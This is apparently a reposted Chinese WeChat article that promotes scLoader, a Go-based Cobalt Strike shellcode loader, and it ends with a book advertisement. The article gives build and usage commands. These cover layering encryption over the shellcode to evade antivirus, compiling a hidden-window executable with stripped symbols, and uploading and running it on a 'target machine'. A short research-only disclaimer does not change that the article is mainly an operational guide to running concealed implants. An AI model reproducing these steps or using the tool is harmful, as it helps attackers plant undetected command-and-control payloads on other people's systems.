项目作者:Peithon 项目地址:https://github.com/Peithon/scLoader
1、编译sparrow.go(不想编译直接go run也行)
找到项目中builder/sparrow.go文件,然后如图编译即可
2、使用sparrow.exe加密shellcode
在CS中生成需要格式的shellcode,将CS生成的原始.bin文件或.c文件放在sparrow.exe同一目录,使用命令
#.bin文件.sparrow.exe -e des,rc4,aes,3des,base64 -f .payload.bin#.c文件.sparrow.exe -e des,rc4,aes,3des,base64 -f .payload.c
注意:-e参数必须使用base64编码结尾
3、将加密之后的shellcode填充到/loader/loader.go中的shellcode变量
4、将-e参数的值(加密顺序)填充到/loader/loader.go中的encodestr变量中
5、编译/loader/loader.go文件
go build -trimpath -ldflags="-w -s -H=windowsgui" ./loader/loader.go6、上传到目标机器,使用loader.exe -token命令加载shellcode
四、声明:
仅供安全研究与学习之用,若将工具做其他用途,由使用者承担全部法律及连带责任,作者不承担任何法律及连带责任。
推荐书籍
加我微信:ivu123ivu,进送书活动群,不定时免费送书
《Python爬虫与反爬虫开发从入门到精通》
随着网络技术的迅速发展,如何有效地提取并利用信息,以及如何有效地防止信息被爬取,已成为一个巨大的挑战。本书从零开始系统地介绍了Python网络爬虫与反爬虫的开发与实战技能,全书共分为4篇,具体内容安排如下。第1篇:基础篇(第1~3章)。系统地讲解了Python爬虫与反爬虫开发环境的搭建、爬虫与反爬虫通用基础知识、Python编程基础。第2篇:爬虫篇(第4~8章)。这部分讲解了网络爬虫的相关知识与技能,主要包括网络爬虫快速入门、XPath匹配网页数据、re正则匹配数据、WebSocket数据抓取、Scrapy爬虫框架应用与开发等。第3篇:反爬虫篇(第9~16章)。这部分讲解了网络反爬虫的相关知识与技能,主要包括爬虫与反爬虫的区别与认识、反爬—Header信息校验、反爬—IP限制、反爬—动态渲染页面、反爬—文本混淆、反爬—特征识别、反爬—验证码识别、反爬—APP数据抓取等。第4篇:实战篇(第17章)。本篇主要列举了4个案例,综合讲解Python爬虫与反爬虫项目的实战应用。本书从零基础开始讲解,系统全面,案例丰富,注重实战,既适合Python程序员和爬虫爱好者阅读学习,也可以作为广大职业院校相关专业的教材或参考用书。
原文始发于微信公众号(web安全工具库):CS shellcode 加载器 -- scLoader
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论